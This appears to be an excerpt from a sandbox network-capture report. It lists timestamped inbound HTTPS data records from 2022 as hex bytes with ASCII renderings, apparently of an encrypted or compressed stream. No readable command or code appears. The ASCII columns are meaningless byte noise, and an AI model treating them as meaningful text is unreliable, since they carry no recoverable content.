                                                                                                                                                            2022-09-29 12:44:54 UTC1189INData Raw: 4c 76 fd dc 1f 9a 93 13 0a be e6 c1 77 55 d5 4c c0 38 6f 8c 40 c0 46 87 2f 32 7a 6a b6 9c 83 80 6b 29 75 8c a9 89 78 27 0e a9 2a 7d 4d c0 31 0f 34 c2 33 f4 03 c1 78 34 7a 0b bf b8 b0 94 4a 9e 3d 62 a1 05 32 e7 2b db 0a c0 1b 75 0b 89 4e fa 4b 13 06 12 9b 96 4e d0 45 c7 df a3 c3 0c 5f d0 1c 2d 8b 06 7f af 9f e6 d5 09 fb 15 05 40 04 68 f7 4f 97 97 30 5c 58 00 71 1a 23 b6 b0 5e 81 e6 0d e6 ad 82 fc 3a ea 40 f8 07 87 6a 9a fe 1c 44 63 a1 ba 6e a0 ea 24 de 20 08 49 62 fd e7 ee e4 09 bf f2 b7 87 b8 a6 a1 3e 06 2f c7 47 c2 90 df 50 47 88 9e 31 a6 d4 2e 18 20 54 bc 4b 1f d8 c7 fb 93 31 4d 2b a2 62 5c e8 c0 10 33 e3 4b a4 c7 3b 3a d6 4e a7 9f 5e 17 18 a6 d8 fa 9a 2f b8 98 ad ee 89 e9 34 2d d5 e9 36 49 31 b2 be 37 82 42 1d 7a 28 0a 04 57 0d 33 9b c0 8d f5 7c 1f e5
                                                                                                                                                            Data Ascii: LvwUL8o@F/2zjk)ux'*}M143x4zJ=b2+uNKNE_-@hO0\Xq#^:@jDcn$ Ib>/GPG1. TK1M+b\3K;:N^/4-6I17Bz(W3|
                                                                                                                                                            2022-09-29 12:44:54 UTC1191INData Raw: 84 ba ea 78 a2 22 8b 60 1e 4a 78 a8 c8 05 7e fc 3d 96 4c 66 f6 62 40 6e 89 d1 60 55 13 9c b0 69 e8 fd 06 cd 85 a4 e8 29 16 10 7a 9b 1e 77 bc 36 f8 00 62 f9 c0 da b4 30 b5 2f 66 c5 6d 6f 91 b2 33 83 d1 11 17 64 1a a2 0d a8 65 fc 1c 59 0c e6 33 f5 2b 38 1c 84 be cf 4b 36 07 9c 7a de 66 d1 4b fc 4b 3d 99 b1 4b 75 18 f0 d2 2a 0c a2 15 f4 be 9f 26 a1 92 2a b7 73 47 29 1b 5e 40 52 d3 c4 2e a0 89 4f 24 8f ef a4 62 58 d1 56 01 c9 24 91 7a 6a b1 fc 02 93 6b 4e e8 7f 7e 4d 63 e0 b8 74 c6 6e 3f bc 05 a3 54 95 ad ee 20 3f 20 38 a0 74 7c 91 7c 86 e3 5c 8a 03 fd 88 f7 48 b3 1d 44 6d 9d 83 e6 04 6a 96 ae a4 7f 2a 01 ff ff fa c7 a4 50 a7 33 6c f2 f3 40 c3 3e 8c 47 d6 b0 bc dc 5b 83 20 92 6a 6d 13 de ec 5a 96 46 a6 7b 08 60 fc fb ad 5c d8 47 8f ef 26 ea 41 37 49 84 72 d9
                                                                                                                                                            Data Ascii: x"`Jx~=Lfb@n`Ui)zw6b0/fmo3deY3+8K6zfKK=Ku*&*sG)^@R.O$bXV$zjkN~Mctn?T ? 8t||\HDmj*P3l@>G[ jmZF{`\G&A7Ir
                                                                                                                                                            2022-09-29 12:44:54 UTC1192INData Raw: 9d 8b 6c 4d a1 e7 92 17 e9 e7 16 fd 24 fa 64 fc d4 91 c9 12 8c 1c 56 44 8b 30 53 5e 41 2e b6 2c d3 fb cb 49 e9 61 f1 b0 6a 49 59 c6 77 29 60 7f 35 f7 23 e0 90 58 d9 b5 9f 1b 22 1f 19 8b f3 77 33 9f 8b fc b6 7b 69 89 bd 69 42 65 b5 26 39 fc 1a e2 ff f2 19 cd 39 a4 c4 3f 5d b7 df 8d 32 e0 c4 ed bc 8c 76 70 e3 3f 51 1e c6 ec 23 69 f5 90 92 90 79 28 76 e4 da 91 8e 17 49 a2 b1 75 16 ee 69 ab 25 3a b0 ee aa 07 ee 81 c8 22 6e 65 38 52 bb a1 d7 ca a8 2c 24 e8 a0 14 98 8d 52 f8 c8 b4 f4 c9 0e d5 9a ba 66 50 b6 8d c3 95 78 79 b6 94 b0 4f 7c f1 f7 62 4a a8 63 89 78 40 98 fe f2 f9 72 17 9f 00 96 f7 76 03 37 58 7a 44 b9 58 85 77 92 6e 3e e4 96 ec 07 2d f7 4a f5 2c 6d cd 5e 92 e0 d5 b7 a8 62 4e bb 41 a3 da 7c ff 64 8f 2b 6f e6 bc 7d ac 7d 2b 45 e1 bc 38 c2 f6 45 62 c8
                                                                                                                                                            Data Ascii: lM$dVD0S^A.,IajIYw)`5#X"w3{iiBe&99?]2vp?Q#iy(vIui%:"ne8R,$RfPxyO|bJcx@rv7XzDXwn>-J,m^bNA|d+o}}+E8Eb
                                                                                                                                                            2022-09-29 12:44:54 UTC1193INData Raw: 67 54 d1 f2 15 cc 49 f1 b9 b7 d5 65 3d 3d c7 34 00 39 ac 3b 3a 26 d9 f6 20 ca 6b f2 26 40 8b bd 4f 85 9c 95 2a 0f 15 82 aa 2e 92 0e 04 75 a1 52 73 42 a5 c3 a3 0e 9b f4 94 74 a0 1c ea b4 0e 4d 3b 81 c0 30 94 c1 6d 4a ad e3 60 32 c0 97 7a 18 82 c1 bb 60 bb 36 47 c1 96 2a 51 c1 de 58 52 7d bb eb 6f 8f ef dc 64 64 75 d7 e9 f5 7c 94 90 2e 84 c2 68 98 43 d9 59 7c 7e 48 49 8c 2b 11 44 ac 39 11 16 b6 d7 40 80 2d 46 b5 8b 4f 0d 24 f8 dc b1 1a 14 13 a2 dc 76 97 57 0c 22 e8 ce 48 fe 19 e8 0e 8f 7c 32 d4 28 53 78 8c db a6 a3 c8 14 19 cb cc ce d8 02 56 d8 50 59 27 74 19 97 24 6f a8 51 5d 46 75 a4 68 87 2d 9a 71 e9 5b 6a 29 23 47 09 f1 42 39 5a 50 52 84 d3 c2 3b 77 b6 d6 19 bf 76 b7 d3 f1 07 cb 3b c3 1b 64 1d 5d fd a0 0f 7c 0e 9c f4 fb 0c 9a 7a 72 f3 89 92 8e 7b 65 42
                                                                                                                                                            Data Ascii: gTIe==49;:& k&@O*.uRsBtM;0mJ`2z`6G*QXR}oddu|.hCY|~HI+D9@-FO$vW"H|2(SxVPY't$oQ]Fuh-q[j)#GB9ZPR;wv;d]|zr{eB
                                                                                                                                                            2022-09-29 12:44:54 UTC1195INData Raw: 77 40 ae 70 db fc a9 f2 4d 66 58 c8 8e a6 06 ef 3c e8 40 61 45 4a d3 55 6c 06 87 de 09 27 71 80 ee ef 1f 72 d7 1f 02 9a d0 ca 1f e9 7e 8a 8a d0 69 37 66 2b bd d3 79 0a 28 47 98 d7 d4 dc a2 6c 48 05 85 06 93 42 03 e6 a2 99 fa 96 f8 39 c2 cf 91 b5 35 54 20 f5 7f f3 03 87 b1 48 88 f7 f3 87 54 a1 71 fc e8 3d 51 1e d5 87 c8 b9 06 6b c6 9c 04 89 45 75 b7 b9 b8 b8 20 cf a2 1a 78 13 47 bf ec d1 b5 ed d8 a3 3f 7a a5 8b 1c 3f 69 92 69 5b 97 7f 49 67 ba b3 2c 33 68 0b 30 b8 fc b1 f3 ac 98 12 c9 05 54 ae 4a 8c e0 84 9c 5d 78 68 1e 63 0e 32 fb 90 4e 81 c0 d9 d8 66 e6 78 bb d5 b5 8a 58 50 8a 48 32 bd 25 e7 a3 0b 58 29 65 ed 02 5d 53 79 0a 0b 49 bf 5d 01 79 c7 41 f3 76 78 ec bd 62 6b 0e 06 ef 76 cb 67 14 4a 96 b8 8d 37 c2 09 cc 5f 6f 32 8e fb 5e 33 e7 00 21 a3 a2 20 e5
                                                                                                                                                            Data Ascii: w@pMfX<@aEJUl'qr~i7f+y(GlHB95T HTq=QkEu xG?z?ii[Ig,3h0TJ]xhc2NfxXPH2%X)e]SyI]yAvxbkvgJ7_o2^3!
                                                                                                                                                            2022-09-29 12:44:54 UTC1196INData Raw: 05 a5 75 16 71 88 7f fb 06 ca 60 ae 74 34 65 f6 7b ab 2c 1d 19 ab 91 9c d6 5e 4a 3e f7 ed 34 e2 90 4e 8b fe f2 d3 1d cd c9 b9 3e cb f5 21 4f 77 e2 70 2e 6d 09 50 fb d2 f1 2e f9 f8 a8 70 c9 0f a8 a2 c6 b1 6d f2 d8 ad 01 59 13 4e 95 d6 1e 31 cc bd 2d 44 a8 4c 78 a3 73 87 6a fc dd 4f cb 61 fb 07 73 7c e6 09 ed 28 77 42 ff c0 b3 88 80 b6 5e d0 c1 cf af 6b d8 05 e3 a6 38 8f c0 51 bd 90 be 90 72 bc 14 6e 4e 10 3a c4 ca 79 73 33 44 97 b1 ac b9 31 ae 3e e5 a4 15 22 36 de 86 89 50 49 06 11 ca ea c0 11 23 72 4c 4b 4f 5c 0a cb cd 1a 76 ee 49 24 9c 42 4e f4 4b 5b a2 c8 d1 72 26 4c ff 53 c9 d1 9b bf 43 d8 21 7a da 31 8d 68 97 ed 78 c1 cf 9e 3a 3b 80 0d 64 17 76 a3 10 a8 92 12 7e a8 fe 40 ed f0 3c 6e f4 e5 70 39 21 a9 c3 32 1e 34 50 54 68 6e f1 4d ec 7b f7 9e ae 0f a9
                                                                                                                                                            Data Ascii: uq`t4e{,^J>4N>!Owp.mP.pmYN1-DLxsjOas|(wB^k8QrnN:ys3D1>"6PI#rLKO\vI$BNK[r&LSC!z1hx:;dv~@<np9!24PThnM{
                                                                                                                                                            2022-09-29 12:44:54 UTC1198INData Raw: ba 8f 38 62 51 a4 46 69 23 ea bd 56 15 43 98 09 b9 c1 dc 46 6a a9 90 5c 94 9c 77 2b 1b 9f 3a bf 1b 01 22 42 1b 22 ea b9 32 02 cc b4 11 54 4f 09 df 30 53 2b 4b 41 0f 5f ca b3 0f e7 23 ab ad 0a 41 c0 b5 dd c1 d8 83 ac bc cd 27 d0 ec 95 f7 b6 b4 ff 16 53 a7 9e f9 d7 0d d4 c5 70 9c d5 33 bc dc 7f 1c 9d 21 eb eb 93 dd 1b b1 fe 89 98 dd f1 d8 60 23 49 ff 25 c6 ef 65 b8 f0 85 04 f5 4e b4 38 bb 85 5a 01 61 c0 36 c5 04 da 25 26 dc d2 4c ba ff 1c 30 5c 62 a0 07 80 c6 97 46 6a 02 14 0a 49 41 ea 62 3e 3c 70 ba 2f fa 3f 44 8c 12 66 66 87 d7 47 97 7f 6b 68 19 5a 90 80 20 20 bf 0f 57 b2 c9 c0 9e 02 30 28 01 13 63 ee 89 22 b8 5f 8d 18 94 eb d4 2d c7 ee da 96 8b b3 66 8d 43 f7 31 87 ae d4 e8 74 6c 65 e9 07 32 43 a6 91 02 6a 06 c1 93 52 9c 77 ea 00 53 e3 a0 6e fb 18 a6 4c
                                                                                                                                                            Data Ascii: 8bQFi#VCFj\w+:"B"2TO0S+KA_#A'Sp3!`#I%eN8Za6%&L0\bFjIAb><p/?DffGkhZ W0(c"_-fC1tle2CjRwSnL
                                                                                                                                                            2022-09-29 12:44:54 UTC1199INData Raw: e7 87 3e d5 3b 5f de 41 c5 d4 bf c7 cd ce c5 b8 3f de 73 d3 a9 e6 6f 89 24 fa 27 71 bc ee 12 ac ff f8 0d 52 eb c4 e4 81 70 a7 1e d3 5c 2b 85 c9 a9 84 17 37 39 e9 b6 7b 9e 43 bc 3e 4c f6 13 03 b7 af af f0 68 5b 22 34 9a 20 a2 ff 2b 16 45 65 d5 e2 8d 94 0f 45 02 19 3d ed 11 54 91 80 af 37 74 47 42 36 d4 4b f8 16 58 46 b2 6e 89 e5 59 94 da e9 58 3e 8e e2 c6 03 a1 5b 27 58 11 5c 3e 8a bb 22 67 9d 9f 03 42 22 54 36 72 5c 3a 82 c1 10 22 6f ed d4 c5 cb ba fa 39 f4 c9 2e 59 99 48 8e 97 0a 5c a4 93 d1 41 04 24 b9 1d 04 eb 3a e1 f1 98 fc 8c 48 8a 8a 73 57 e8 76 99 ed 9d 0f ef 60 16 9e a3 35 65 89 13 08 df 20 7e 23 c2 36 39 19 7f d2 e8 33 6c 26 23 fe 09 50 0b 33 ae f1 37 b2 5a 9d 47 c1 c6 2a b9 3b 54 2a 64 55 31 1b f1 4c 0c 00 0f ea 2f 9b 46 f9 99 5e 56 70 e3 da 8a
                                                                                                                                                            Data Ascii: >;_A?so$'qRp\+79{C>Lh["4 +EeE=T7tGB6KXFnYX>['X\>"gB"T6r\:"o9.YH\A$:HsWv`5e ~#693l&#P37ZG*;T*dU1L/F^Vp
                                                                                                                                                            2022-09-29 12:44:54 UTC1199INData Raw: df 26 e7 c2 81 32 b2 96 c1 5c 83 32 f9 d3 13 1c 80 e6 13 32 59 ee d1 31 dd 01 2a 0a f0 74 ae 04 70 cb 2d 41 a8 19 ef c8 00 02 a4 cd 09 9c 78 47 bb 30 f1 91 ca 02 56 16 f7 58 19 7f 78 f1 17 28 14 18 83 e3 04 63 38 aa 6e 67 cd 26 2f b5 b8 84 78 8f 9a c7 ac 62 ce fe 8f aa 51 b2 3e f5 03 d0 e3 28 a5 f9 e1 94 94 33 d6 76 e1 80 ce 2d 90 a1 d9 bc 14 b1 00 56 6b 48 61 1c 32 7f 90 41 a7 ec bd 68 ec bf c5 6c fc 8b 61 c8 7f 7b 52 05 fd 34 a0 30 90 ed 54 29 32 d6 0f 1f 35 94 3e 77 0e 90 3f c4 d7 78 22 7a ba 72 a3 01 fe b3 9b b0 57 9e 25 1b 20 fd de 71 e2 ae 55 c3 f6 76 25 08 c4 a0 5d 9f bb eb e7 53 e8 95 dc 2a 0f 46 48 7a 68 82 6b 96 eb 8b a0 10 17 3b 16 85 21 14 58 55 49 93 9a 50 b3 e8 23 6b ec fb d6 df 17 aa 12 8b 07 89 68 fb 43 4f b7 77 80 75 e2 c4 2f 07 50 f6 a2
                                                                                                                                                            Data Ascii: &2\22Y1*tp-AxG0VXx(c8ng&/xbQ>(3v-VkHa2Ahla{R40T)25>w?x"zrW% qUv%]S*FHzhk;!XUIP#khCOwu/P
                                                                                                                                                            2022-09-29 12:44:54 UTC1215INData Raw: ae c3 69 ce 87 7e b8 fb 2e f3 71 e1 cc 72 52 53 a0 4f 69 ea c6 49 1f de 61 48 43 fa ea 6b ca 93 c9 cc c0 d4 4c ed cf d5 40 cc 8a 5e 9c 2a 87 3f 20 76 80 01 aa f7 ef c2 57 a5 d1 a5 4f 02 da a1 9c 0c 2a 27 ea 2f 6d fd 11 5e f6 65 51 88 03 06 d2 f1 08 0e f7 a5 6d ae dc 6b d2 5d 8f 06 c2 4f 18 df 31 bd fe 65 08 89 e4 ae 5c c6 c3 83 93 b0 74 4b f3 0b 33 01 4f c6 e5 58 54 f1 c6 22 fe 7e b4 cc 26 fd d4 40 a2 20 ac 31 8c 90 d6 b7 22 69 8a 65 d1 d7 c3 f7 02 62 95 bc 8b 9b 06 ab 4b b1 0d a5 a0 8e 6c 7f 04 78 40 7f 65 3b e3 0c 6b f3 c2 4e 10 5f 91 8f b0 c1 e9 9b 50 b1 a6 1e 57 57 81 89 af ea 0f 2d 0b f5 e7 1f 73 3b 95 fa 70 af fd cd e7 41 ff 1e 02 ae fc 82 9b 92 c7 92 ba 00 54 90 3c 0c b9 1d df f5 48 24 c6 41 fd 2d b4 b2 d8 50 51 a0 04 e5 0c 70 65 5a 44 21 0f 60 e1
                                                                                                                                                            Data Ascii: i~.qrRSOiIaHCkL@^*? vWO*'/m^eQmk]O1e\tK3OXT"~&@ 1"iebKlx@e;kN_PWW-s;pAT<H$A-PQpeZD!`
                                                                                                                                                            2022-09-29 12:44:54 UTC1231INData Raw: 19 a7 eb 23 14 6c 04 46 33 b3 26 f4 19 7f 96 03 c0 17 b3 eb 99 3c 2d 70 92 d9 8c 66 ea 47 1b 34 34 ec 00 b5 9e 98 e6 e7 a5 34 14 de a4 c9 0f a0 ed 92 04 10 77 06 7b 13 2e ed f4 d6 0f e7 f5 f8 bb ab e5 0b 7f 6a 35 95 c6 0c 83 46 8d 38 d9 ea 73 63 31 31 85 b6 0b 43 ca 34 4a 3b 13 3b 54 4a 9c d7 32 5f ee 8f 35 74 7d 14 b0 28 b6 49 5b 84 ca 9a e1 ca 2b ea 05 03 7c 26 3f 6e 31 8e 9f d8 4b 69 68 e3 30 ad e7 c5 fd c1 85 15 d0 35 82 11 95 17 b6 78 3a 97 50 c6 72 73 11 7c e6 61 aa 1d 9a 8d 58 05 46 35 e0 69 60 41 21 5d e2 cc f3 15 b2 4e 87 6f 65 13 90 3e 6e c6 73 36 84 0c d3 3e 1c c2 79 24 96 b1 14 c9 50 20 97 3c d1 3d fb 96 fe da cf 8d 39 e8 5c 04 79 ac 97 fc 0f 2c 0d a0 d2 d2 93 c3 c5 e2 fe 92 d2 54 2d fe 31 4d d7 35 4a 6e d1 17 d4 ca 34 8b f5 51 b4 be 66 7a c6
                                                                                                                                                            Data Ascii: #lF3&<-pfG444w{.j5F8sc11C4J;;TJ2_5t}(I[+|&?n1Kih05x:Prs|aXF5i`A!]Noe>ns6>y$P <=9\y,T-1M5Jn4Qfz
                                                                                                                                                            2022-09-29 12:44:54 UTC1247INData Raw: 9e 49 df 64 a2 fe 37 9f 15 cb 44 dd f4 9d 67 88 6c c8 d2 c4 c1 17 43 93 ed 1f 16 77 3f dd 94 22 0e 56 18 fa 21 c8 dd ee 56 97 a7 92 d0 6d 43 4c 28 06 23 af 29 a8 51 36 ff 92 0f fe fd 3a 0a 3d f8 b8 3d b8 63 33 06 7e aa 85 6f 0b c3 5b 69 71 0f 28 78 f7 3d 28 c7 94 2a 63 81 59 4b 99 31 9d 3e 9e ef 56 0b 10 71 c4 b0 96 f3 36 97 a5 c5 4a 75 22 e4 da b3 14 c3 fc 90 cd 96 6b 09 b1 ec 42 da a4 0d d8 91 33 93 55 59 60 4d 82 06 6e 51 00 f0 f4 b5 6f 2f 2f a5 52 84 d7 76 7a d4 60 07 1d 6b 3a 0b 9a f1 53 5f 5e 15 ee 9e 60 bd ec 21 3e c7 ed b6 c8 5b 40 a9 4f 97 47 94 66 4b 57 1c a6 96 b3 41 2e d3 f3 b8 48 77 4c 46 a2 39 af 81 85 db 58 d2 89 52 9d b3 a5 3e f7 6a df ed 72 8e 75 99 14 2e 7b 09 df cc d6 17 75 97 63 88 50 27 37 b1 c1 f3 20 6d e6 bb e4 b0 5d b1 4f 0f c8 94
                                                                                                                                                            Data Ascii: Id7DglCw?"V!VmCL(#)Q6:==c3~o[iq(x=(*cYK1>Vq6Ju"kB3UY`MnQo//Rvz`k:S_^`!>[@OGfKWA.HwLF9XR>jru.{ucP'7 m]O
                                                                                                                                                            2022-09-29 12:44:54 UTC1263INData Raw: 0b 3d 12 44 63 89 68 92 40 e3 e7 c4 b5 5a f5 fc 7e 03 fc 4f 73 28 eb 43 0c e8 6e d8 aa fb b9 62 ae e9 cc 14 b0 d6 c7 25 c9 13 aa eb 77 5e cc c4 78 72 5f 39 f9 4d e4 03 57 37 05 2d d3 a6 6e cb 64 cf fa da 5c f2 5e 98 49 84 cc 85 f8 cc 4d 00 e8 96 b2 7d 28 df ed 00 22 4c a2 31 e4 1c 39 15 0e 34 65 41 21 57 05 6b 19 c9 32 36 c1 3e f5 22 8b b8 4c 9c 9c dc 20 65 14 6f 8a 27 63 67 79 25 e1 4a f8 ef 1d b3 15 85 bf 5c ed 56 83 da 45 4a df f4 5a 17 9c 47 ad 4e 6c 0e 17 e6 47 60 13 5e 8a 0f 13 b9 b0 42 7b 9f 05 6a 38 53 d5 c3 99 60 34 bb 19 35 4b 7c 11 8b a9 70 4a 13 e8 ec 75 49 8c 2a c7 6b 38 33 c1 b7 e7 b7 a3 64 f8 00 c7 4f b6 d6 08 f8 ef fd 2f a9 11 64 02 b6 39 60 fc 95 7a 07 c2 c3 fe e7 1a b1 bc 86 9a ed 34 aa aa e0 ae ba 68 2c 51 83 9f e1 20 dc 6e b9 fa 8c ab
                                                                                                                                                            Data Ascii: =Dch@Z~Os(Cnb%w^xr_9MW7-nd\^IM}("L194eA!Wk26>"L eo'cgy%J\VEJZGNlG`^B{j8S`45K|pJuI*k83dO/d9`z4h,Q n
                                                                                                                                                            2022-09-29 12:44:54 UTC1279INData Raw: fd e1 18 88 0a d4 00 02 da 63 1f 44 f8 90 a0 f2 12 00 73 4b fe aa ed 09 11 3f 2b e2 a4 cf 43 70 6f 2d ba 08 e3 12 79 cd 65 1d c5 e6 c6 49 a1 0e b1 93 28 bb b2 1a 95 31 d3 cd c8 e8 79 17 d8 13 32 65 d2 37 0f ee 2d c8 92 ca c6 c6 ef ae 66 a7 1b 21 c1 6c 34 84 0a 7b 92 4f 9b 15 80 26 d5 2d 68 7a 72 5e e0 c1 0f f1 95 91 fe be ab 0e 2a 13 48 e8 23 5d 51 ad e7 91 fc 30 47 ca a1 17 4d 25 90 59 0e 51 2c 6a 06 d5 eb a5 aa 77 55 e9 f5 6b 48 4d 97 4d 80 e9 8c a1 be 2b 55 05 6f 2d 60 18 85 e2 1a 1b 98 e0 4b 78 6e 4b 15 bd 91 8b 5e 79 b1 00 ca e3 d4 cd 57 bd 63 81 d3 1f 6a f1 2e de b0 6c 03 1f 39 02 29 b0 c4 3f 56 31 d4 6a 88 98 2b 58 6b ad a7 e0 5e 71 ab ee 52 94 d3 cc cd 73 63 87 c9 d9 ad cb db 8d 6a 5e f6 0c cc 01 0f a5 41 d9 7e 37 fe 6a 36 ae f0 4b 0c 23 3a 5e eb
                                                                                                                                                            Data Ascii: cDsK?+Cpo-yeI(1y2e7-f!l4{O&-hzr^*H#]Q0GM%YQ,jwUkHMM+Uo-`KxnK^yWcj.l9)?V1j+Xk^qRscj^A~7j6K#:^
                                                                                                                                                            2022-09-29 12:44:54 UTC1295INData Raw: d1 44 80 ff f9 a2 d2 be d8 7f 0a 01 6f 0c 0c 4d 69 7e 3a 92 8c ed 83 5e 58 aa e6 6b 77 ad e9 dd b0 fe c7 2c b4 4b 64 5a 6b a2 84 07 ef e6 ab 7c 34 20 b6 df d1 5a 3e 19 a4 80 0e 64 3b b8 70 ce 58 78 35 38 c0 2b e8 3f 11 fb cd 8b 2c ba b1 7e 61 20 40 7f 74 00 b9 f0 97 e8 c2 ec dd 83 d0 99 70 0f 01 65 aa 50 f4 1a 49 e1 df 71 58 af 46 14 69 07 5d 34 9b a8 b4 8b 94 14 86 97 41 79 60 30 f5 ae ad 7c 6f 07 5f 31 9b d0 ac ca aa 6b c9 29 fd 3f 4b 87 e7 5b 20 c3 42 d3 b1 21 bb ca 28 39 cb da b8 68 b8 35 a8 72 ab 91 f2 bc 25 d5 76 3a 89 0a d8 18 8f 85 df 0a ee 7f c0 47 c2 61 c3 91 c1 13 18 96 8f cb ff dc cf e2 be cf 29 3b 6a 42 90 e0 d9 83 3a 20 93 cb 34 ef 32 07 65 5c be c4 ae f7 9f 42 10 e3 f3 e7 e4 a9 28 f5 47 7f 92 62 aa 63 d2 9f 7a 5a 4b fc aa f6 09 2c 17 1b 16
                                                                                                                                                            Data Ascii: DoMi~:^Xkw,KdZk|4 Z>d;pXx58+?,~a @tpePIqXFi]4Ay`0|o_1k)?K[ B!(9h5r%v:Ga);jB: 42e\B(GbczZK,
                                                                                                                                                            2022-09-29 12:44:54 UTC1311INData Raw: 95 5b 26 42 05 b6 31 83 00 8e 83 a2 23 3a 0f ed d3 77 4a b1 ff d7 48 9f 78 1c f3 96 23 21 23 b6 ae 45 43 a8 2b d1 e1 51 22 85 26 f8 1f e8 a4 29 74 d9 e2 f8 5e 82 5e cb e6 cd ee 00 cb e8 c9 9e 7a 02 77 34 74 bb 79 72 e7 f8 69 2c 47 95 1b b6 dd f1 17 2c 3e 83 8e 2b ac a0 50 a7 ef 02 0b e3 65 1e 1e 76 27 5f 8d 32 e2 1b 1d 01 20 cc 90 e6 7c dd a3 35 ba 8b 9f 67 1d 65 01 fa c5 19 20 c7 63 43 08 c6 8d 6e 0c 28 57 d0 19 8e 59 ea 44 1b d6 82 5b 51 c9 1d b7 b5 49 93 77 6a 4d 47 96 15 a9 6e 14 f1 17 7d 15 02 39 d7 87 fd c7 bc 77 31 0e 93 aa a5 6f 91 1a 66 f4 8f 3c 45 3e 6f 22 d5 80 6f 09 e9 b2 9c 83 70 7e 71 dd 40 5b 52 e1 4c 5d ea dc 4a 41 19 0e 2e e7 03 a9 1c 37 0a 08 71 01 6e 5d 11 4c 68 74 f3 0f da cd fa 7c f2 c7 52 1d 4c 75 dc 9d 4f 5e 11 d0 c0 64 cf 1b 09 76
                                                                                                                                                            Data Ascii: [&B1#:wJHx#!#EC+Q"&)t^^zw4tyri,G,>+Pev'_2 |5ge cCn(WYD[QIwjMGn}9w1of<E>o"op~q@[RL]JA.7qn]Lht|RLuO^dv
                                                                                                                                                            2022-09-29 12:44:54 UTC1327INData Raw: 08 7b 1f ab 19 aa ef 3e 03 71 87 df 70 8e 5e 8a 13 66 ea 8e 5e 06 37 a7 f3 9d aa fb df 24 79 33 4b 45 2e 00 07 83 57 21 43 37 9c e9 3f 4b 70 92 84 41 de b0 88 86 1b 23 b0 a3 c1 0b c9 3f 7d 89 d5 17 34 d9 b6 72 c3 44 10 f1 96 c8 62 ef dd d2 57 5c 0d a4 eb 0c 3f d8 f8 32 da ba da f0 b7 43 df 79 40 da 00 82 ec cb 57 6c 70 6c 5c ed 0e 4f 05 1a fd d8 6b 94 58 73 8b 53 f1 35 0c 80 d1 11 7c b8 29 dd a9 0d 8f 13 9c 9c 38 dd c6 ce 74 12 ca aa a1 c4 4f ef 00 22 6d a6 f4 87 3e ee 18 c7 2c 44 2d d2 e1 8f d1 0c 5c e3 c0 1d d1 23 84 10 98 9f a3 ea ec c3 ad ee fa 58 02 5c 19 67 02 1d c2 62 34 1a c4 89 cb f1 3b f9 5e 7a 2d 5f c2 bb 32 a6 56 e7 2f ac a1 27 5c f1 f6 d0 c1 6b ce 47 39 4d dc e2 1e 68 32 1d 8a 3b f9 4e b6 e3 fe e1 04 e6 e2 bf 39 4b 82 52 c1 a7 40 e7 c1 53 6c
                                                                                                                                                            Data Ascii: {>qp^f^7$y3KE.W!C7?KpA#?}4rDbW\?2Cy@Wlpl\OkXsS5|)8tO"m>,D-\#X\gb4;^z-_2V/'\kG9Mh2;N9KR@Sl
                                                                                                                                                            2022-09-29 12:44:54 UTC1343INData Raw: c6 d0 89 bf 98 8c f7 e9 d1 db e3 e1 f7 13 e0 93 9d c6 cd b2 f7 7c 20 c6 33 d1 34 40 53 51 99 dd b4 e4 60 87 39 88 dc 4e cd e8 ec de ed 89 8d 16 40 d3 86 86 b1 54 0d 0f c2 a2 f7 bb 37 0c 36 9a 3d 0b 01 22 ee e8 0f 45 e5 64 a0 98 16 fa bb d1 0b 08 86 5c b7 d9 33 df f5 4c 41 ff 7a 6d 12 a5 05 8b 6c 03 7d c5 2e 2e 01 16 be 30 97 2a 0c 7f bc e8 dc d6 77 c7 ee 0f bc f6 11 86 ca 89 d6 e5 ba c3 a7 f0 ae c8 ed 0d 4f 8a 4e f9 bb 8c 7d a7 f4 cf 24 b1 da c7 22 d2 bf d5 56 66 7b fd 51 18 6f 38 b0 f8 dc a1 8a 14 50 c4 d9 3b f6 4b 7d 30 ab 4a 11 1a c0 d6 bd 42 5a 6f ce 76 6c ed b4 a4 05 0d fa b1 e5 14 e6 a8 4a 5e f7 d0 83 06 af 65 7d de c8 fb 06 f4 d9 6e 84 62 d7 57 b0 29 0d ba 3c da 66 b0 bb 28 b0 f9 a7 ca 61 69 74 2e 59 10 cf a8 7a 09 f4 7b 2c ba 8e 7a 89 e7 0c 57 cc
                                                                                                                                                            Data Ascii: | 34@SQ`9N@T76="Ed\3LAzml}..0*wON}$"Vf{Qo8P;K}0JBZovlJ^e}nbW)<f(ait.Yz{,zW
                                                                                                                                                            2022-09-29 12:44:54 UTC1359INData Raw: 84 cc 81 b4 9b 43 db 9e 63 59 e1 33 42 3e 65 81 6b 45 42 67 ff 6b 64 aa b8 67 a3 d2 ec 9d 01 14 64 98 60 f5 58 80 fa c1 2d d5 a1 d5 46 fa cb 03 8e 17 41 03 73 7c 06 2b d8 9f d5 86 f1 43 6d 90 f2 e7 39 1f af 25 9d de 88 5a 8c 89 83 3e 18 da 2d 99 69 3c b5 ea 70 de 8f 67 a1 b4 bd 05 c9 ff 2a 1c 45 eb 9c dd 8d 00 6e 52 5c cb 18 16 d5 78 dc c2 a4 4d c1 a2 3c 9a 0e 09 9a a8 c7 51 4c e3 0a 7f 6e cf 5c 46 13 55 5d d8 6b 0c e6 ec a7 ab 6b 72 7a a8 62 67 da 19 7b 79 20 e0 e6 00 1d a3 a7 88 02 67 78 bd eb ea 36 fe 57 e6 d9 bc f2 37 31 8c b1 00 4f 25 01 4a ea 28 91 3c 8b e7 09 c4 f4 84 34 60 0f 47 87 60 10 a0 b8 f3 dd 40 e7 ab 45 dc cc c0 f1 6f 2b af f4 3f 7c 69 21 48 5a 4b 6a 5b dd 88 75 59 2b e1 ce ef ae 34 51 74 1e 84 af 17 1e f8 70 13 ba bc a7 2a 2c 60 4a d7 7f
                                                                                                                                                            Data Ascii: CcY3B>ekEBgkdgd`X-FAs|+Cm9%Z>-i<pg*EnR\xM<QLn\FU]kkrzbg{y gx6W71O%J(<4`G`@Eo+?|i!HZKj[uY+4Qtp*,`J
